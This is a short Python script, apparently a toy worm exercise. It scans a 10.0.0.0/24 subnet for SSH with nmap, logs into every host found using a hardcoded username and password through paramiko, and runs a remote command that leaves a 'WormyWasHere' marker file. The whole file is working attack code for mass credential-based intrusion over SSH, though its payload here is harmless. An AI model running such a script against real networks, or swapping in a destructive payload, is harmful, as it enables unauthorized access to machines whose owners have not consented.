#! /usr/bin/env python3

import nmap
import paramiko

nmScan = nmap.PortScanner()
nmScan.scan('10.0.0.0/24', '22')
nmScan.command_line()
networkhosts = []

for host in nmScan.all_hosts():
    networkhosts.append(host)
print(networkhosts)

for element in networkhosts:
    host = element
    port = 22
    username = "stephen"
    password = "stephen"
    command = "mkdir Wormy; cd ~/Wormy; touch 'WormyWasHere'"
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(host, port, username, password, timeout=5)
        stdin, stdout, stderr = ssh.exec_command(command)
    except:
        print("Timeout :(")
    print(host)
